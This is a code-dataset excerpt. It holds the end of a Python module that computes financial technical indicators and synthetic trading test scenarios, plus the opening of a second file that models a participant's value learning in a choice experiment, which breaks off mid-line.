parameters[\"window_size\"]\n if isinstance(bol_window, str):\n bol_window = int(bol_window)\n bol_std = 2.25\n if \"bol_std\" in parameters:\n bol_std = parameters[\"bol_std\"]\n if isinstance(bol_std, str):\n bol_std = float(bol_std)\n long_ma_window = 500\n\n bol_band = ta.volatility.BollingerBands(close=df[\"close\"], window=bol_window, window_dev=bol_std)\n df[\"lower_band\"+ suffix] = bol_band.bollinger_lband()\n df[\"higher_band\"+ suffix] = bol_band.bollinger_hband()\n df[\"ma_band\"+ suffix] = bol_band.bollinger_mavg()\n df['long_ma' + suffix] = ta.trend.sma_indicator(close=df['close'], window=long_ma_window)\n\n df['bollinger' + suffix] = True # bollinger indicator trigger\n\n elif indicator == 'envelope':\n envelope_window = 5\n if \"window_size\" in parameters:\n envelope_window = parameters[\"ma_window_size\"]\n if isinstance(envelope_window, str):\n envelope_window = int(envelope_window)\n\n ma = \"sma\"\n if \"ma\" in parameters:\n ma = parameters[\"ma\"]\n if not isinstance(\"ma\", str):\n ma = \"sma\"\n\n ma_offset_1 = 3\n ma_offset_2 = 5\n ma_offset_3 = 7\n if \"ma_offset_1\" in parameters:\n ma_offset_1 = parameters[\"ma_offset_1\"]\n if isinstance(ma_offset_1, str):\n ma_offset_1 = float(ma_offset_1)\n if \"ma_offset_2\" in parameters:\n ma_offset_2 = parameters[\"ma_offset_2\"]\n if isinstance(ma_offset_2, str):\n ma_offset_2 = float(ma_offset_2)\n if \"ma_offset_3\" in parameters:\n ma_offset_3 = parameters[\"ma_offset_3\"]\n if isinstance(ma_offset_3, str):\n ma_offset_3 = float(ma_offset_3)\n\n if ma == \"sma\":\n df[\"ma_base\"+ suffix] = ta.trend.SMAIndicator(close=df[\"close\"], window=envelope_window).sma_indicator()\n # df[\"ma_base\"+ suffix] = ta.trend.sma_indicator(close=df[\"close\"], window=envelope_window)\n # df[\"ma_base\"+ suffix] = TA.SMA(df, envelope_window, \"close\")\n\n predict_val, coef = utils.predict_next_LinearRegression(df, \"ma_base\"+ suffix, envelope_window)\n df.at[df.index[-1], \"ma_base\" + suffix] = predict_val\n\n df[\"envelope_long_1\"+ suffix] = df[\"ma_base\"+ suffix] - df[\"ma_base\"+ suffix] * ma_offset_1 / 100\n df[\"envelope_long_2\"+ suffix] = df[\"ma_base\"+ suffix] - df[\"ma_base\"+ suffix] * ma_offset_2 / 100\n df[\"envelope_long_3\"+ suffix] = df[\"ma_base\"+ suffix] - df[\"ma_base\"+ suffix] * ma_offset_3 / 100\n\n df[\"envelope_short_1\"+ suffix] = df[\"ma_base\"+ suffix] + df[\"ma_base\"+ suffix] * ma_offset_1 / 100\n df[\"envelope_short_2\"+ suffix] = df[\"ma_base\"+ suffix] + df[\"ma_base\"+ suffix] * ma_offset_2 / 100\n df[\"envelope_short_3\"+ suffix] = df[\"ma_base\"+ suffix] + df[\"ma_base\"+ suffix] * ma_offset_3 / 100\n\n df['envelope' + suffix] = True # bollinger indicator trigger\n\n elif indicator == 'synthetic_bollinger':\n df.reset_index(inplace=True)\n # TEST SCENARIO\n df['close'] = 10\n df[\"lower_band\"+ suffix] = 9\n df[\"higher_band\"+ suffix] = 11\n df[\"ma_band\"+ suffix] = 9.5\n df[\"long_ma\"+ suffix] = 7\n\n t = 1000 + 50\n t_plus = 25\n df.at[t, \"close\"] = df[\"higher_band\"+ suffix].iloc[t] + 0.01\n # OPEN LONG\n df['close'] = np.where(df.index >= t, df[\"higher_band\"+ suffix] + 0.5, df['close'])\n t = t + t_plus\n df['close'] = np.where(df.index >= t, df[\"higher_band\"+ suffix] + 1, df['close'])\n t = t + t_plus\n df['close'] = np.where(df.index >= t, df[\"higher_band\"+ suffix] + 1.5, df['close'])\n # CLOSE LONG\n t = t + t_plus\n df['ma_band' + suffix] = np.where(df.index >= t, df[\"close\"] + 1, df['ma_band' + suffix])\n\n # OPEN SHORT\n t = t + t_plus\n df['lower_band' + suffix] = np.where(df.index >= t, df[\"close\"] + 0.6, df['lower_band' + suffix])\n df['long_ma+ suffix'] = np.where(df.index >= t, df[\"close\"] + 0.3, df['long_ma' + suffix])\n\n t = t + t_plus\n df['close'] = np.where(df.index >= t, df[\"close\"] - 0.5, df['close'])\n t = t + t_plus\n df['close'] = np.where(df.index >= t, df[\"close\"] - 1, df['close'])\n t = t + t_plus\n df['close'] = np.where(df.index >= t, df[\"close\"] - 1.5, df['close'])\n t = t + t_plus\n # CLOSE SHORT\n df['ma_band' + suffix] = np.where(df.index >= t, df[\"close\"] - 2.5, df['ma_band' + suffix])\n\n # OPEN LONG\n t = t + t_plus\n df['long_ma' + suffix] = np.where(df.index >= t, df[\"close\"] - 0.3, df['long_ma' + suffix])\n t = t + t_plus\n df['close'] = np.where(df.index >= t, df[\"higher_band\"+ suffix] + 0.5, df['close'])\n t = t + t_plus\n df['close'] = np.where(df.index >= t, df[\"close\"] - 0.5, df['close'])\n t = t + t_plus\n df['close'] = np.where(df.index >= t, df[\"close\"] - 1, df['close'])\n t = t + t_plus\n df['close'] = np.where(df.index >= t, df[\"close\"] - 1.5, df['close'])\n # CLOSE LONG\n t = t + t_plus\n df['ma_band' + suffix] = np.where(df.index >= t, df[\"close\"] + 2, df['ma_band' + suffix])\n\n t = t + t_plus\n df['higher_band' + suffix] = np.where(df.index >= t, df[\"higher_band\"+ suffix] + 4, df['higher_band' + suffix])\n\n # OPEN SHORT\n t = t + t_plus\n df['lower_band' + suffix] = np.where(df.index >= t, df[\"close\"] - 1, df['lower_band' + suffix])\n t = t + t_plus\n df['lower_band' + suffix] = np.where(df.index >= t, df[\"close\"] + 1, df['lower_band' + suffix])\n t = t + t_plus\n df['close'] = np.where(df.index >= t, df[\"close\"] + 0.5, df['close'])\n t = t + t_plus\n df['close'] = np.where(df.index >= t, df[\"close\"] + 1, df['close'])\n t = t + t_plus\n df['close'] = np.where(df.index >= t, df[\"close\"] + 1.5, df['close'])\n # CLOSE SHORT BY MA_BAND ALREADY BELOW CLOSE\n\n # OPEN LONG\n t = t + t_plus\n df['higher_band' + suffix] = np.where(df.index >= t, df[\"higher_band\"+ suffix] - 4, df['higher_band' + suffix])\n t = t + t_plus\n df['close'] = np.where(df.index >= t, df[\"close\"] + 0.5, df['close'])\n t = t + t_plus\n df['close'] = np.where(df.index >= t, df[\"close\"] + 1, df['close'])\n t = t + t_plus\n df['close'] = np.where(df.index >= t, df[\"close\"] + 1.5, df['close'])\n\n # CLOSE LONG\n t = t + t_plus\n df['ma_band' + suffix] = np.where(df.index >= t, df[\"close\"] + 0.5, df['ma_band' + suffix])\n\n # END OF SCENARIO\n df.set_index(['timestamp'], inplace=True, drop=True)\n df = utils.get_n_columns(df, [\"ma_band\"+ suffix, \"lower_band\"+ suffix, \"higher_band\"+ suffix, \"close\"], 1)\n\n df['syntheticbollinger' + suffix] = True # bollinger indicator trigger\n\n elif indicator == 'cci_30':\n df['cci_30' + suffix] = stock.get('cci_30').copy()\n \n elif indicator == 'dx_30':\n df['dx_30' + suffix] = stock.get('dx_30').copy()\n \n elif indicator == 'williams_%r':\n df['williams_%r' + suffix] = TA.WILLIAMS(stock).copy()\n\n elif indicator == 'stoch_%k':\n df['stoch_%k' + suffix] = TA.STOCH(stock).copy()\n\n elif indicator == 'stoch_%d':\n df['stoch_%d' + suffix] = TA.STOCHD(stock).copy()\n \n elif indicator == 'er':\n df['er' + suffix] = TA.ER(stock).copy()\n \n elif indicator == 'stc':\n df['stc' + suffix] = TA.STC(stock).copy()\n \n elif indicator == 'adx':\n df['adx' + suffix] = TA.ADX(stock).copy()\n \n elif indicator == 'roc':\n df['roc' + suffix] = TA.ROC(stock).copy()\n\n elif indicator == 'mom':\n df['mom' + suffix] = TA.MOM(stock).copy()\n\n elif indicator == 'simple_rtn':\n df['simple_rtn' + suffix] = df['close'].pct_change()\n\n elif indicator == 'labeling':\n df = flabeling.data_labeling(df, params)\n\n elif indicator.startswith('tv_'):\n df[indicator] = tv.get_recommendation(df, indicator, params)\n\n # shift feature: column_shift_nb ex: close_shift_5\n elif '_shift_' in indicator:\n lst_split = indicator.split(\"_\")\n df[indicator+ suffix] = df[lst_split[0]].shift(int(lst_split[2]), axis=0)\n\n elif indicator == 'vsa':\n days = [1, 2, 3, 5, 20, 40, 60]\n df = vsa.create_bunch_of_vsa_features(df, days)\n df['outcomes_vsa' + suffix] = df.close.pct_change(-1)\n\n elif indicator == \"super_trend_direction\":\n st = supertrend.SuperTrend(\n df['high'], \n df['low'], \n df['close'], \n 15, # self.st_short_atr_window\n 5 # self.st_short_atr_multiplier\n )\n \n df['super_trend_direction' + suffix] = st.super_trend_direction()\n #df['super_trend_direction'] = df['super_trend_direction'].shift(1)\n\n elif indicator == \"super_reversal\":\n short_ema_window = 5\n long_ema_window = 15\n # -- Populate indicators --\n super_trend = supertrend.SuperTrend(\n df['high'],\n df['low'],\n df['close'],\n long_ema_window,\n short_ema_window\n )\n df['super_trend_direction' + suffix] = super_trend.super_trend_direction()\n df['ema_short' + suffix] = ta.trend.ema_indicator(close=df['close'], window=short_ema_window)\n df['ema_long' + suffix] = ta.trend.ema_indicator(close=df['close'], window=long_ema_window)\n\n df = utils.get_n_columns(df, [\"super_trend_direction\"+ suffix, \"ema_short\"+ suffix, \"ema_long\"+ suffix], 1)\n df['superreversal' + suffix] = True # super_reversal indicator trigger\n df['super_reversal' + suffix] = True # super_reversal indicator trigger\n\n elif indicator == 'syntheticsuperreversal':\n df.reset_index(inplace=True)\n # TEST SCENARIO\n df['close'] = 5\n df[\"high\"] = 10\n df[\"low\"] = 17\n df[\"n1_ema_short\"+ suffix] = 14\n df[\"n1_ema_long\"+ suffix] = 15\n df[\"n1_super_trend_direction\"+ suffix] = False\n\n # OPEN LONG AT t\n t = 100 + 400\n df['n1_ema_short' + suffix] = np.where(df.index >= t, df[\"n1_ema_long\"+ suffix] + 1, df['n1_ema_short' + suffix])\n df['n1_super_trend_direction+ suffix'] = np.where(df.index >= t, True, df['n1_super_trend_direction' + suffix])\n df['low'] = np.where(df.index >= t, df[\"n1_ema_short\"+ suffix] - 1, df['low'])\n\n df['close'] = np.where(df.index >= t + 10, df[\"close\"] + 1, df['close'])\n\n # CLOSING SHORT\n t = t + 100\n df['n1_ema_short' + suffix] = np.where(df.index >= t, df[\"n1_ema_long\"+ suffix] - 1, df['n1_ema_short' + suffix])\n df['n1_super_trend_direction' + suffix] = np.where(df.index >= t, False, df['n1_super_trend_direction' + suffix])\n df['high'] = np.where(df.index >= t, df[\"n1_ema_short\"+ suffix] + 5, df['high'])\n\n # CLOSING SHORT\n t = t + 100\n df['n1_ema_short' + suffix] = np.where(df.index >= t, 20, df['n1_ema_short' + suffix])\n df['n1_ema_long' + suffix] = np.where(df.index >= t, df['n1_ema_short' + suffix] -1, df['n1_ema_long' + suffix])\n df['n1_super_trend_direction' + suffix] = np.where(df.index >= t, True, df['n1_super_trend_direction' + suffix])\n df['low'] = np.where(df.index >= t, df['n1_ema_short' + suffix] -1, df['low'])\n\n # OPENING SHORT\n t = t + 100\n df['n1_ema_short' + suffix] = np.where(df.index >= t, 25, df['n1_ema_short' + suffix])\n df['n1_ema_long' + suffix] = np.where(df.index >= t, df['n1_ema_short' + suffix] +1, df['n1_ema_long' + suffix])\n df['n1_super_trend_direction' + suffix] = np.where(df.index >= t, False, df['n1_super_trend_direction' + suffix])\n df['high'] = np.where(df.index >= t, df['n1_ema_short' + suffix] +2, df['high'])\n\n df['close'] = np.where(df.index >= t + 10, df[\"close\"] - 1, df['close'])\n\n # CLOSING SHORT\n t = t + 100\n df['n1_ema_short' + suffix] = np.where(df.index >= t, 30, df['n1_ema_short' + suffix])\n df['n1_ema_long' + suffix] = np.where(df.index >= t, df['n1_ema_short' + suffix] -1, df['n1_ema_long' + suffix])\n df['n1_super_trend_direction' + suffix] = np.where(df.index >= t, True, df['n1_super_trend_direction' + suffix])\n df['low'] = np.where(df.index >= t, df['n1_ema_short' + suffix] -1, df['low'])\n\n df[\"ema_short\"+ suffix] = df[\"n1_ema_short\"+ suffix]\n df[\"ema_long\"+ suffix] = df[\"n1_ema_long\"+ suffix]\n df[\"super_trend_direction\"+ suffix] = df[\"n1_super_trend_direction\"+ suffix]\n\n df['syntheticsuperreversal' + suffix] = True\n\n df.set_index(['timestamp'], inplace=True, drop=True)\n\n # keep only the requested indicators\n if keep_only_requested_indicators:\n for column in list(df.columns):\n if column not in keep_indicators:\n df.drop(columns=[column], inplace=True)\n\n # drop \"timestamp\" as it is redundant with index\n if \"timestamp\" in list(df.columns):\n df.drop(columns=[\"timestamp\"], inplace=True)\n \n return df\n \ndef make_date(df, date_field):\n \"Make sure `df[date_field]` is of the right date type.\"\n field_dtype = df[date_field].dtype\n if isinstance(field_dtype, pd.core.dtypes.dtypes.DatetimeTZDtype):\n field_dtype = np.datetime64\n if not np.issubdtype(field_dtype, np.datetime64):\n df[date_field] = pd.to_datetime(df[date_field], infer_datetime_format=True)\n\ndef add_temporal_indicators(df, field_name, time=False):\n \"Helper function that adds columns relevant to a date in the column `field_name` of `df`.\"\n\n # Change all column headings to be lower case, and remove spacing\n df.columns = [str(x).lower().replace(' ', '_') for x in df.columns]\n\n if field_name not in df.columns and field_name != df.index.name:\n print(\"[add_temporal_indicators] {} is not present among the columns {} or in the index {}\".format(field_name, df.columns, df.index.name))\n return df\n\n # if the datefield is the index of the dataframe, we create a temporary column\n field_to_drop = False\n if field_name == df.index.name:\n field_name = 'DateTmp'\n df[field_name] = df.index\n field_to_drop = True\n\n make_date(df, field_name)\n\n field = df[field_name]\n prefix = \"\" #ifnone(prefix, re.sub('[Dd]ate$', '', field_name))\n attr = ['Year', 'Month', 'Week', 'Day', 'Dayofweek', 'Dayofyear', 'Is_month_end', 'Is_month_start',\n 'Is_quarter_end', 'Is_quarter_start', 'Is_year_end', 'Is_year_start']\n if time: attr = attr + ['Hour', 'Minute', 'Second']\n # Pandas removed `dt.week` in v1.1.10\n week = field.dt.isocalendar().week.astype(field.dt.day.dtype) if hasattr(field.dt, 'isocalendar') else field.dt.week\n for n in attr: df[prefix + n] = getattr(field.dt, n.lower()) if n != 'Week' else week\n mask = ~field.isna()\n df[prefix + 'Elapsed'] = np.where(mask, field.values.astype(np.int64) // 10 ** 9, np.nan)\n if field_to_drop: df.drop(field_name, axis=1, inplace=True)\n\n return df\n\ndef remove_features(df, features):\n for feature in features:\n try:\n df.drop(feature, axis=1, inplace=True)\n except KeyError as feature:\n print(\"{}. Columns are {}\".format(feature, df.columns))\n return df\n\ndef normalize_column_headings(df):\n # Change all column headings to be lower case, and remove spacing\n df.columns = [str(x).lower().replace(' ', '_') for x in df.columns]\n return df\n\ndef get_trend_info(df):\n tmp = pd.concat([df['close']], axis=1, keys=['close'])\n tmp = compute_indicators(tmp, [\"trend_1d\"])\n tmp['shift_trend_1d'] = tmp['trend_1d'].shift(-1)\n tmp.dropna(inplace=True)\n\n tmp['true_positive'] = np.where((tmp['trend_1d'] == 1) & (tmp['shift_trend_1d'] == 1), 1, 0)\n tmp['true_negative'] = np.where((tmp['trend_1d'] == 0) & (tmp['shift_trend_1d'] == 0), 1, 0)\n tmp['false_positive'] = np.where((tmp['trend_1d'] == 1) & (tmp['shift_trend_1d'] == 0), 1, 0)\n tmp['false_negative'] = np.where((tmp['trend_1d'] == 0) & (tmp['shift_trend_1d'] == 1), 1, 0)\n\n # how many times the trend is up\n trend_counted = tmp['trend_1d'].value_counts(normalize=True)\n trend_ratio = 100 * trend_counted[1]\n\n # how many times trend today = trend tomorrow\n true_positive = 100*tmp['true_positive'].value_counts(normalize=True)[1]\n true_negative = 100*tmp['true_negative'].value_counts(normalize=True)[1]\n false_positive = 100*tmp['false_positive'].value_counts(normalize=True)[1]\n false_negative = 100*tmp['false_negative'].value_counts(normalize=True)[1]\n\n return trend_ratio, true_positive, true_negative, false_positive, false_negative\n\ndef get_stats_for_trend_up(df, n_forward_days):\n tmp = df.copy()\n\n indicator = \"trend_\"+str(n_forward_days)+\"d\"\n if indicator not in tmp.columns:\n tmp = compute_indicators(tmp, [indicator])\n\n # how many times the trend is up for d+n_forward_days\n trend_counted = tmp[indicator].value_counts(normalize=True)\n trend_ratio = 100 * trend_counted[1]\n\n return trend_ratio\n\ndef get_stats_on_trend_today_equals_trend_tomorrow(df):\n tmp = pd.concat([df['close']], axis=1, keys=['close'])\n tmp = compute_indicators(tmp, [\"trend_1d\"])\n tmp['shift_trend'] = tmp[\"trend_1d\"].shift(-1)\n tmp.dropna(inplace=True)\n\n tmp['true_positive'] = np.where((tmp[\"trend_1d\"] == 1) & (tmp['shift_trend'] == 1), 1, 0)\n tmp['true_negative'] = np.where((tmp[\"trend_1d\"] == 0) & (tmp['shift_trend'] == 0), 1, 0)\n tmp['false_positive'] = np.where((tmp[\"trend_1d\"] == 1) & (tmp['shift_trend'] == 0), 1, 0)\n tmp['false_negative'] = np.where((tmp[\"trend_1d\"] == 0) & (tmp['shift_trend'] == 1), 1, 0)\n\n # how many times trend today = trend tomorrow\n true_positive = 100*tmp['true_positive'].value_counts(normalize=True)[1]\n true_negative = 100*tmp['true_negative'].value_counts(normalize=True)[1]\n false_positive = 100*tmp['false_positive'].value_counts(normalize=True)[1]\n false_negative = 100*tmp['false_negative'].value_counts(normalize=True)[1]\n\n return true_positive, true_negative, false_positive, false_negative\n\ndef shift(df, indicator, shift):\n if isinstance(shift, str):\n shift = int(shift)\n \n df[indicator] = df[indicator].shift(shift)\n return df\n\ndef remove_missing_values(df):\n df['inf'] = 0\n for col in df.columns:\n df['inf'] = np.where((df[col] == np.inf) | (df[col] == -np.inf), 1, df['inf'])\n\n df = df.drop(df[df.inf == 1].index)\n df = df.drop(['inf'], axis=1)\n\n df.replace([np.inf, -np.inf], np.nan)\n # Drop the NaNs\n df.dropna(axis=0, how='any', inplace=True)\n\n return df\n\n\ndef remove_duplicates(df):\n df.drop_duplicates(inplace=True)\n return df\n", "repo_name": "cedfactory/fdp", "sub_path": "src/indicators.py", "file_name": "indicators.py", "file_ext": "py", "file_size_in_byte": 38151, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "parse.parse", "line_number": 15, "usage_type": "call"}, {"api_name": "parse.parse", "line_number": 16, "usage_type": "call"}, {"api_name": "parse.parse", "line_number": 17, "usage_type": "call"}, {"api_name": "parse.parse", "line_number": 18, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 159, "usage_type": "attribute"}, {"api_name": "stockstats.StockDataFrame.retype", "line_number": 167, "usage_type": "call"}, {"api_name": "stockstats.StockDataFrame", "line_number": 167, "usage_type": "name"}, {"api_name": "collections.OrderedDict", "line_number": 178, "usage_type": "call"}, {"api_name": "parse.parse", "line_number": 215, "usage_type": "call"}, {"api_name": "parse.parse", "line_number": 216, "usage_type": "call"}, {"api_name": "parse.parse", "line_number": 217, "usage_type": "call"}, {"api_name": "parse.parse", "line_number": 218, "usage_type": "call"}, {"api_name": "parse.parse", "line_number": 219, "usage_type": "call"}, {"api_name": "finta.TA.SMA", "line_number": 232, "usage_type": "call"}, {"api_name": "finta.TA", "line_number": 232, "usage_type": "name"}, {"api_name": "ta.trend.ema_indicator", "line_number": 241, "usage_type": "call"}, {"api_name": "ta.trend", "line_number": 241, "usage_type": "attribute"}, {"api_name": "ta.momentum.williams_r", "line_number": 249, "usage_type": "call"}, {"api_name": "ta.momentum", "line_number": 249, "usage_type": "attribute"}, {"api_name": "ta.momentum.williams_r", "line_number": 264, "usage_type": "call"}, {"api_name": "ta.momentum", "line_number": 264, "usage_type": "attribute"}, {"api_name": "finta.TA.WMA", "line_number": 278, "usage_type": "call"}, {"api_name": "finta.TA", "line_number": 278, "usage_type": "name"}, {"api_name": "finta.TA.SMA", "line_number": 282, "usage_type": "call"}, {"api_name": "finta.TA", "line_number": 282, "usage_type": "name"}, {"api_name": "finta.TA.EMA", "line_number": 286, "usage_type": "call"}, {"api_name": "finta.TA", "line_number": 286, "usage_type": "name"}, {"api_name": "finta.TA.WMA", "line_number": 290, "usage_type": "call"}, {"api_name": "finta.TA", "line_number": 290, "usage_type": "name"}, {"api_name": "numpy.polyfit", "line_number": 294, "usage_type": "call"}, {"api_name": "finta.TA.BBANDS", "line_number": 307, "usage_type": "call"}, {"api_name": "finta.TA", "line_number": 307, "usage_type": "name"}, {"api_name": "pandas.concat", "line_number": 308, "usage_type": "call"}, {"api_name": "ta.momentum.rsi", "line_number": 319, "usage_type": "call"}, {"api_name": "ta.momentum", "line_number": 319, "usage_type": "attribute"}, {"api_name": "ta.momentum.stochrsi", "line_number": 330, "usage_type": "call"}, {"api_name": "ta.momentum", "line_number": 330, "usage_type": "attribute"}, {"api_name": "ta.momentum.StochRSIIndicator", "line_number": 332, "usage_type": "call"}, {"api_name": "ta.momentum", "line_number": 332, "usage_type": "attribute"}, {"api_name": "ta.momentum.StochRSIIndicator", "line_number": 334, "usage_type": "call"}, {"api_name": "ta.momentum", "line_number": 334, "usage_type": "attribute"}, {"api_name": "ta.momentum.StochRSIIndicator", "line_number": 349, "usage_type": "call"}, {"api_name": "ta.momentum", "line_number": 349, "usage_type": "attribute"}, {"api_name": "ta.momentum.StochRSIIndicator", "line_number": 372, "usage_type": "call"}, {"api_name": "ta.momentum", "line_number": 372, "usage_type": "attribute"}, {"api_name": "ta.momentum.StochRSIIndicator", "line_number": 374, "usage_type": "call"}, {"api_name": "ta.momentum", "line_number": 374, "usage_type": "attribute"}, {"api_name": "ta.momentum.StochRSIIndicator", "line_number": 376, "usage_type": "call"}, {"api_name": "ta.momentum", "line_number": 376, "usage_type": "attribute"}, {"api_name": "ta.volatility.AverageTrueRange", "line_number": 400, "usage_type": "call"}, {"api_name": "ta.volatility", "line_number": 400, "usage_type": "attribute"}, {"api_name": "ta.momentum.awesome_oscillator", "line_number": 415, "usage_type": "call"}, {"api_name": "ta.momentum", "line_number": 415, "usage_type": "attribute"}, {"api_name": "ta.momentum.awesome_oscillator", "line_number": 436, "usage_type": "call"}, {"api_name": "ta.momentum", "line_number": 436, "usage_type": "attribute"}, {"api_name": "ta.volatility.BollingerBands", "line_number": 456, "usage_type": "call"}, {"api_name": "ta.volatility", "line_number": 456, "usage_type": "attribute"}, {"api_name": "ta.trend.sma_indicator", "line_number": 460, "usage_type": "call"}, {"api_name": "ta.trend", "line_number": 460, "usage_type": "attribute"}, {"api_name": "ta.trend.SMAIndicator", "line_number": 494, "usage_type": "call"}, {"api_name": "ta.trend", "line_number": 494, "usage_type": "attribute"}, {"api_name": "numpy.where", "line_number": 524, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 526, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 528, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 531, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 535, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 536, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 539, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 541, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 543, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 546, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 550, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 552, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 554, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 556, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 558, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 561, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 564, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 568, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 570, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 572, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 574, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 576, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 581, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 583, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 585, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 587, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 591, "usage_type": "call"}, {"api_name": "finta.TA.WILLIAMS", "line_number": 606, "usage_type": "call"}, {"api_name": "finta.TA", "line_number": 606, "usage_type": "name"}, {"api_name": "finta.TA.STOCH", "line_number": 609, "usage_type": "call"}, {"api_name": "finta.TA", "line_number": 609, "usage_type": "name"}, {"api_name": "finta.TA.STOCHD", "line_number": 612, "usage_type": "call"}, {"api_name": "finta.TA", "line_number": 612, "usage_type": "name"}, {"api_name": "finta.TA.ER", "line_number": 615, "usage_type": "call"}, {"api_name": "finta.TA", "line_number": 615, "usage_type": "name"}, {"api_name": "finta.TA.STC", "line_number": 618, "usage_type": "call"}, {"api_name": "finta.TA", "line_number": 618, "usage_type": "name"}, {"api_name": "finta.TA.ADX", "line_number": 621, "usage_type": "call"}, {"api_name": "finta.TA", "line_number": 621, "usage_type": "name"}, {"api_name": "finta.TA.ROC", "line_number": 624, "usage_type": "call"}, {"api_name": "finta.TA", "line_number": 624, "usage_type": "name"}, {"api_name": "finta.TA.MOM", "line_number": 627, "usage_type": "call"}, {"api_name": "finta.TA", "line_number": 627, "usage_type": "name"}, {"api_name": "ta.trend.ema_indicator", "line_number": 672, "usage_type": "call"}, {"api_name": "ta.trend", "line_number": 672, "usage_type": "attribute"}, {"api_name": "ta.trend.ema_indicator", "line_number": 673, "usage_type": "call"}, {"api_name": "ta.trend", "line_number": 673, "usage_type": "attribute"}, {"api_name": "numpy.where", "line_number": 691, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 692, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 693, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 695, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 699, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 700, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 701, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 705, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 706, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 707, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 708, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 712, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 713, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 714, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 715, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 717, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 721, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 722, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 723, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 724, "usage_type": "call"}, {"api_name": "pandas.core", "line_number": 749, "usage_type": "attribute"}, {"api_name": "numpy.datetime64", "line_number": 750, "usage_type": "attribute"}, {"api_name": "numpy.issubdtype", "line_number": 751, "usage_type": "call"}, {"api_name": "numpy.datetime64", "line_number": 751, "usage_type": "attribute"}, {"api_name": "pandas.to_datetime", "line_number": 752, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 782, "usage_type": "call"}, {"api_name": "numpy.int64", "line_number": 782, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 782, "usage_type": "attribute"}, {"api_name": "pandas.concat", "line_number": 801, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 806, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 807, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 808, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 809, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 837, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 842, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 843, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 844, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 845, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 865, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 865, "usage_type": "attribute"}, {"api_name": "numpy.inf", "line_number": 870, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 870, "usage_type": "attribute"}]} +{"seq_id": "74087888168", "text": "import numpy as np\nimport numpy.random as random\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport copy\nimport os\n\nclass participant():\n \"\"\"\n class to keep values of participant, predict selection, and update values\n according to reward for Single Context Experiments\n\n key attribute:\n self.values, list, in the form of [[V_AL, V_AR], [V_BL, V_BR]]. Only the\n two values related to the input sequence will be used. Based on the mode,\n two or four values will be upgraded.\n\n self.alphas, learning rate matrix, list, in the form of [[a_AL, a_AR], [a_BL, a_BR]],\n each alpha is a constant and not updated throughout the process.\n\n self.beta, the linear parameter of stockxxxxx, should be between 0 and 1?\n\n Since values and alphas are in the form of x_ij, where i/j = 0 for A/L, or 1 for B/R,\n the calculation can be made by using index of list, which, hopefully, will be easier.\n\n self.mode, 2 or 4, marking if only 2 values will be updated, or all four values will be\n updated, as suggested by different model\n\n self.values_history, list of all past values, so a list of list (which is of list again)\n \"\"\"\n\n def __init__(self, name=None, values=[[1,0],[0.5,0.5]], alphas=[[0.3,0.1],[0.1,0.3]], beta=1.0, mode=2):\n if name is None:\n self.name = \"participant\"\n else:\n self.name = str(name)\n\n self.values = values\n #print(\"Init Values: {v}\".format(v = self.values))\n self.values_history = [[[],[]],[[],[]]]\n self.alphas = alphas\n self.beta = beta\n\n self.possible_sequence = [\"A\", \"B\"]\n self.possible_response = [\"L\", \"R\"]\n\n assert mode in [1,2,4], \"Unknown 